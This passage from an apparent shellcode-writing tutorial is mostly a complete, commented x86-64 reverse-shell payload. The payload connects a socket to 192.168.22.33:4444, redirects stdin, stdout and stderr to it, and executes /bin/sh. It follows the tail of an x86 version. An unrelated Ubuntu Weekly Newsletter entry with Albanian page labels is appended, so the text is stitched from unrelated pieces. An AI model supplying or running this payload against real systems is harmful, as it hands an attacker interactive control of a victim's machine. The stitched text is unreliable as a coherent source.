xor eax, eax push eax push ebx ; pointer to array in ecx mov ecx, esp ; null envp xor edx, edx ; call SYS_execve = 0xb mov eax, 0xb ; execute the shell! int 0x80 Reverse Shell in x86-64

This will be very similar to the x86 shellcode, but adjusted for x86-64. I will use the proper x86-64 system calls and 64-bit registers where possible.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 ; Do the steps to setup a socket (1) ; Setup the arguments to socket() in appropriate registers xor rdx, rdx ; Flags = 0 mov rsi, 1 ; SOCK_STREAM = 1 mov rdi, 2 ; AF_INET = 2 ; We're calling SYS_socket mov rax, 41 ; Get the socket syscall ; Time to setup the struct sockaddr_in (2), (3) ; push the address so it ends up in network byte order ; 192.168.22.33 == 0xC0A81621 push 0x2116a8c0 ; push the port as a short in network-byte order ; 4444 = 0x115c mov bx, 0x5c11 push bx ; push the address family, AF_INET = 2 mov bx, 0x2 push bx ; Let's establish the connection (4) ; Save address of our struct mov rsi, rsp ; size of the struct mov rdx, 0x10 ; Our socket fd mov rdi, rax ; Preserve sockfd push rax ; Call SYS_connect mov rax, 42 ; Make the connection syscall ; Let's duplicate the FDs from our socket. (5) ; Load the sockfd pop rdi ; STDERR mov rsi, 2 ; Calling SYS_dup2 = 0x21 mov rax, 0x21 ; Syscall! syscall ; mov to STDOUT dec rsi ; Reload rdi mov rax, 0x21 ; Syscall! syscall ; mov to STDIN dec rsi ; Reload rdi mov rax, 0x21 ; Syscall! syscall ; Now time to execve (6) ; push "/bin/sh\0" on the stack push 0x68732f push 0x6e69622f ; preserve filename mov rdi, rsp ; array of arguments xor rdx, rdx push rdx push rdi ; pointer to array in rsi mov rsi, rsp ; call SYS_execve = 59 mov rax, 59 ; execute the shell! syscall Conclusion

The structural simularities between either assembly implementation and the C source code should be fairly evident. When I write shellcode, I usually write out the list of steps involved, then write a version in C, and finally translate to the assembly for the shellcode. I’m a bit of a control freak, so whenever I need custom shellcode, I got straight to the assembly.

Let me know if there’s a particular shellcode payload you’re interested in me covering or if you have feedback on the style or usefulness of these posts.

The Fridge: Ubuntu Weekly Newsletter Issue 551

Hën, 29/10/2018 - 9:34md

Welcome to the Ubuntu Weekly Newsletter, Issue 551 for the week of October 21 – 27, 2018. The full version of this issue is available here.

In this issue we cover:

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

Faqet